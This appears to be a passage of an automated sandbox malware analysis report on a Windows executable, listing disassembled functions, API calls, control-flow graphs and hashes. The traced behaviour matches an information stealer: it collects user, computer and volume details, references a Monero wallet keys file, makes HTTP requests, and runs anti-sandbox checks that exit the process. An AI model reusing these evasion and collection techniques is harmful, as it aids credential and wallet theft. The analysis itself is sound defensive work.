                        APIs
                          • Part of subcall function 0101A820: lstrlen.KERNEL32(01004F05,?,?,01004F05,01020DDE), ref: 0101A82B
                          • Part of subcall function 0101A820: lstrcpy.KERNEL32(01020DDE,00000000), ref: 0101A885
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 01015644
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 010156A1
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 01015857
                          • Part of subcall function 0101A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0101A7E6
                          • Part of subcall function 010151F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 01015228
                          • Part of subcall function 0101A8A0: lstrcpy.KERNEL32(?,01020E17), ref: 0101A905
                          • Part of subcall function 010152C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 01015318
                          • Part of subcall function 010152C0: lstrlen.KERNEL32(00000000), ref: 0101532F
                          • Part of subcall function 010152C0: StrStrA.SHLWAPI(00000000,00000000), ref: 01015364
                          • Part of subcall function 010152C0: lstrlen.KERNEL32(00000000), ref: 01015383
                          • Part of subcall function 010152C0: lstrlen.KERNEL32(00000000), ref: 010153AE
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0101578B
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 01015940
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 01015A0C
                        • Sleep.KERNEL32(0000EA60), ref: 01015A1B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen$Sleep
                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                        • API String ID: 507064821-2791005934
                        • Opcode ID: 5bc990ccab0bcf98853f875e7e61f30f5731c27745c4a311ec4324339f4ae548
                        • Instruction ID: a8d6476ececad99e161e8d416f048ad6ced8f1cd83d3414f34c98f3c5733831d
                        • Opcode Fuzzy Hash: 5bc990ccab0bcf98853f875e7e61f30f5731c27745c4a311ec4324339f4ae548
                        • Instruction Fuzzy Hash: 43E15372A11145DBDB15FBA0ED95EED7378BF64210F408129E98757088EF386B0ECB91
                        Function 010117A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1301 10117a0-10117cd call 101aad0 StrCmpCA 1304 10117d7-10117f1 call 101aad0 1301->1304 1305 10117cf-10117d1 ExitProcess 1301->1305 1309 10117f4-10117f8 1304->1309 1310 10119c2-10119cd call 101a800 1309->1310 1311 10117fe-1011811 1309->1311 1313 1011817-101181a 1311->1313 1314 101199e-10119bd 1311->1314 1315 1011821-1011830 call 101a820 1313->1315 1316 1011849-1011858 call 101a820 1313->1316 1317 10118ad-10118be StrCmpCA 1313->1317 1318 10118cf-10118e0 StrCmpCA 1313->1318 1319 101198f-1011999 call 101a820 1313->1319 1320 10118f1-1011902 StrCmpCA 1313->1320 1321 1011951-1011962 StrCmpCA 1313->1321 1322 1011970-1011981 StrCmpCA 1313->1322 1323 1011913-1011924 StrCmpCA 1313->1323 1324 1011932-1011943 StrCmpCA 1313->1324 1325 1011835-1011844 call 101a820 1313->1325 1326 101185d-101186e StrCmpCA 1313->1326 1327 101187f-1011890 StrCmpCA 1313->1327 1314->1309 1315->1314 1316->1314 1329 10118c0-10118c3 1317->1329 1330 10118ca 1317->1330 1331 10118e2-10118e5 1318->1331 1332 10118ec 1318->1332 1319->1314 1333 1011904-1011907 1320->1333 1334 101190e 1320->1334 1339 1011964-1011967 1321->1339 1340 101196e 1321->1340 1342 1011983-1011986 1322->1342 1343 101198d 1322->1343 1335 1011930 1323->1335 1336 1011926-1011929 1323->1336 1337 1011945-1011948 1324->1337 1338 101194f 1324->1338 1325->1314 1348 1011870-1011873 1326->1348 1349 101187a 1326->1349 1350 1011892-101189c 1327->1350 1351 101189e-10118a1 1327->1351 1329->1330 1330->1314 1331->1332 1332->1314 1333->1334 1334->1314 1335->1314 1336->1335 1337->1338 1338->1314 1339->1340 1340->1314 1342->1343 1343->1314 1348->1349 1349->1314 1355 10118a8 1350->1355 1351->1355 1355->1314
                        APIs
                        • StrCmpCA.SHLWAPI(00000000,block), ref: 010117C5
                        • ExitProcess.KERNEL32 ref: 010117D1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess
                        • String ID: block
                        • API String ID: 621844428-2199623458
                        • Opcode ID: 0c608d7ff882dda0459ed5adffe3ab43d1b33b7b0301f7031ff4b3c2f2e7cfc0
                        • Instruction ID: 9ea770b596bf0efcb72bf52819ae0c5d725d4640b377faa98b554f323540abd1
                        • Opcode Fuzzy Hash: 0c608d7ff882dda0459ed5adffe3ab43d1b33b7b0301f7031ff4b3c2f2e7cfc0
                        • Instruction Fuzzy Hash: 56515CB4A00209EBDB18DFA5D948ABE77B6FF44704F00804DE996AB248D778E941CB61
                        Function 01017500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1356 1017500-101754a GetWindowsDirectoryA 1357 1017553-10175c7 GetVolumeInformationA call 1018d00 * 3 1356->1357 1358 101754c 1356->1358 1365 10175d8-10175df 1357->1365 1358->1357 1366 10175e1-10175fa call 1018d00 1365->1366 1367 10175fc-1017617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 1017619-1017626 call 101a740 1367->1369 1370 1017628-1017658 wsprintfA call 101a740 1367->1370 1377 101767e-101768e 1369->1377 1370->1377
                        APIs
                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 01017542
                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0101757F
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 01017603
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0101760A
                        • wsprintfA.USER32 ref: 01017640
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                        • String ID: :$C$\
                        • API String ID: 1544550907-3809124531
                        • Opcode ID: 1898a885183eabf42791c5a480f2966122ccf3ecfc358f772836c6a1092a28f4
                        • Instruction ID: c6b2205e7594181cf8475de1c9b62fc1cf24534f9855ffbce9807feebf128240
                        • Opcode Fuzzy Hash: 1898a885183eabf42791c5a480f2966122ccf3ecfc358f772836c6a1092a28f4
                        • Instruction Fuzzy Hash: A04191B5D40248ABDB21DF94DC48BEEBBB8EF18704F004099F54A67284D7786B44CBA5
                        Function 010169F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 01019860: GetProcAddress.KERNEL32(74DD0000,018924E8), ref: 010198A1
                          • Part of subcall function 01019860: GetProcAddress.KERNEL32(74DD0000,018922A8), ref: 010198BA
                          • Part of subcall function 01019860: GetProcAddress.KERNEL32(74DD0000,01892308), ref: 010198D2
                          • Part of subcall function 01019860: GetProcAddress.KERNEL32(74DD0000,018923F8), ref: 010198EA
                          • Part of subcall function 01019860: GetProcAddress.KERNEL32(74DD0000,018923B0), ref: 01019903
                          • Part of subcall function 01019860: GetProcAddress.KERNEL32(74DD0000,018992B8), ref: 0101991B
                          • Part of subcall function 01019860: GetProcAddress.KERNEL32(74DD0000,018857D0), ref: 01019933
                          • Part of subcall function 01019860: GetProcAddress.KERNEL32(74DD0000,01885770), ref: 0101994C
                          • Part of subcall function 01019860: GetProcAddress.KERNEL32(74DD0000,018923C8), ref: 01019964
                          • Part of subcall function 01019860: GetProcAddress.KERNEL32(74DD0000,018922C0), ref: 0101997C
                          • Part of subcall function 01019860: GetProcAddress.KERNEL32(74DD0000,018923E0), ref: 01019995
                          • Part of subcall function 01019860: GetProcAddress.KERNEL32(74DD0000,01892398), ref: 010199AD
                          • Part of subcall function 01019860: GetProcAddress.KERNEL32(74DD0000,01885A10), ref: 010199C5
                          • Part of subcall function 01019860: GetProcAddress.KERNEL32(74DD0000,018924A0), ref: 010199DE
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                          • Part of subcall function 010011D0: ExitProcess.KERNEL32 ref: 01001211
                          • Part of subcall function 01001160: GetSystemInfo.KERNEL32(?), ref: 0100116A
                          • Part of subcall function 01001160: ExitProcess.KERNEL32 ref: 0100117E
                          • Part of subcall function 01001110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0100112B
                          • Part of subcall function 01001110: VirtualAllocExNuma.KERNEL32(00000000), ref: 01001132
                          • Part of subcall function 01001110: ExitProcess.KERNEL32 ref: 01001143
                          • Part of subcall function 01001220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0100123E
                          • Part of subcall function 01001220: __aulldiv.LIBCMT ref: 01001258
                          • Part of subcall function 01001220: __aulldiv.LIBCMT ref: 01001266
                          • Part of subcall function 01001220: ExitProcess.KERNEL32 ref: 01001294
                          • Part of subcall function 01016770: GetUserDefaultLangID.KERNEL32 ref: 01016774
                          • Part of subcall function 01001190: ExitProcess.KERNEL32 ref: 010011C6
                          • Part of subcall function 01017850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,010011B7), ref: 01017880
                          • Part of subcall function 01017850: RtlAllocateHeap.NTDLL(00000000), ref: 01017887
                          • Part of subcall function 01017850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0101789F
                          • Part of subcall function 010178E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 01017910
                          • Part of subcall function 010178E0: RtlAllocateHeap.NTDLL(00000000), ref: 01017917
                          • Part of subcall function 010178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0101792F
                          • Part of subcall function 0101A9B0: lstrlen.KERNEL32(?,01899068,?,\Monero\wallet.keys,01020E17), ref: 0101A9C5
                          • Part of subcall function 0101A9B0: lstrcpy.KERNEL32(00000000), ref: 0101AA04
                          • Part of subcall function 0101A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0101AA12
                          • Part of subcall function 0101A8A0: lstrcpy.KERNEL32(?,01020E17), ref: 0101A905
                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01899218,?,0102110C,?,00000000,?,01021110,?,00000000,01020AEF), ref: 01016ACA
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 01016AE8
                        • CloseHandle.KERNEL32(00000000), ref: 01016AF9
                        • Sleep.KERNEL32(00001770), ref: 01016B04
                        • CloseHandle.KERNEL32(?,00000000,?,01899218,?,0102110C,?,00000000,?,01021110,?,00000000,01020AEF), ref: 01016B1A
                        • ExitProcess.KERNEL32 ref: 01016B22
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                        • String ID:
                        • API String ID: 2525456742-0
                        • Opcode ID: 417215afc5a8c3ebc86be3549f38e13bc4164e146c00a088f1d646007939a0f9
                        • Instruction ID: 12e71dcaa3d088fd9470af5eab702135a2a5402978b34473a216baf61c530cc7
                        • Opcode Fuzzy Hash: 417215afc5a8c3ebc86be3549f38e13bc4164e146c00a088f1d646007939a0f9
                        • Instruction Fuzzy Hash: 2C315E75A4020AABEB15F7F0EC55BEE7778AF24310F004518F583A7188DF786545CBA0
                        Function 01001220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1436 1001220-1001247 call 10189b0 GlobalMemoryStatusEx 1439 1001273-100127a 1436->1439 1440 1001249-1001271 call 101da00 * 2 1436->1440 1442 1001281-1001285 1439->1442 1440->1442 1443 1001287 1442->1443 1444 100129a-100129d 1442->1444 1446 1001292-1001294 ExitProcess 1443->1446 1447 1001289-1001290 1443->1447 1447->1444 1447->1446
                        APIs
                        • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0100123E
                        • __aulldiv.LIBCMT ref: 01001258
                        • __aulldiv.LIBCMT ref: 01001266
                        • ExitProcess.KERNEL32 ref: 01001294
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                        • String ID: @
                        • API String ID: 3404098578-2766056989
                        • Opcode ID: 21c823a443f5cc0c2a475f2c30acca4d4a856d5ee1646ffbd6094419b182b4db
                        • Instruction ID: 9a3e83f713c405af6157523b291fc27a3d995cba3b1f8f314a0290dfdebac88e
                        • Opcode Fuzzy Hash: 21c823a443f5cc0c2a475f2c30acca4d4a856d5ee1646ffbd6094419b182b4db
                        • Instruction Fuzzy Hash: 50014BF0984308BBEB10DBE4DC49B9EBBB8AB14701F248048E745B72C4D67896518B99
                        Function 01016AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1450 1016af3 1451 1016b0a 1450->1451 1453 1016aba-1016ad7 call 101aad0 OpenEventA 1451->1453 1454 1016b0c-1016b22 call 1016920 call 1015b10 CloseHandle ExitProcess 1451->1454 1459 1016af5-1016b04 CloseHandle Sleep 1453->1459 1460 1016ad9-1016af1 call 101aad0 CreateEventA 1453->1460 1459->1451 1460->1454
                        APIs
                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01899218,?,0102110C,?,00000000,?,01021110,?,00000000,01020AEF), ref: 01016ACA
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 01016AE8
                        • CloseHandle.KERNEL32(00000000), ref: 01016AF9
                        • Sleep.KERNEL32(00001770), ref: 01016B04
                        • CloseHandle.KERNEL32(?,00000000,?,01899218,?,0102110C,?,00000000,?,01021110,?,00000000,01020AEF), ref: 01016B1A
                        • ExitProcess.KERNEL32 ref: 01016B22
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                        • String ID:
                        • API String ID: 941982115-0
                        • Opcode ID: d8db6ff1035b0f77bc9c74c60be9b24512885abf25b4f01e53e3401b11e74822
                        • Instruction ID: ed734f82b2c0856c0a8f92b630e0d95057bf43e745306bd40c70f44c0ae050b6
                        • Opcode Fuzzy Hash: d8db6ff1035b0f77bc9c74c60be9b24512885abf25b4f01e53e3401b11e74822
                        • Instruction Fuzzy Hash: DAF03A35A8020AABE720ABA0AC59BBE7A74FB14741F404514B583A6188CBF95540CA55
                        Function 010047B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 01004839
                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 01004849
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CrackInternetlstrlen
                        • String ID: <
                        • API String ID: 1274457161-4251816714
                        • Opcode ID: 7c88172baf7e6bbafeb57558f9964cb4952c6aa1ef48434ac650bfffc0da3adf
                        • Instruction ID: fe0d47b1557f004b7763b0b0b5a8c963a6d1a7e2fb6f33163b88a935fe41ce59
                        • Opcode Fuzzy Hash: 7c88172baf7e6bbafeb57558f9964cb4952c6aa1ef48434ac650bfffc0da3adf
                        • Instruction Fuzzy Hash: 75214FB1E41209ABDF14DFA4E849ADE7B74FB44320F108625F965A72C0EB706A05CF91
                        Function 010151F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 0101A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0101A7E6
                          • Part of subcall function 01006280: InternetOpenA.WININET(01020DFE,00000001,00000000,00000000,00000000), ref: 010062E1
                          • Part of subcall function 01006280: StrCmpCA.SHLWAPI(?,0189EAC8), ref: 01006303
                          • Part of subcall function 01006280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 01006335
                          • Part of subcall function 01006280: HttpOpenRequestA.WININET(00000000,GET,?,0189E020,00000000,00000000,00400100,00000000), ref: 01006385
                          • Part of subcall function 01006280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 010063BF
                          • Part of subcall function 01006280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 010063D1
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 01015228
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
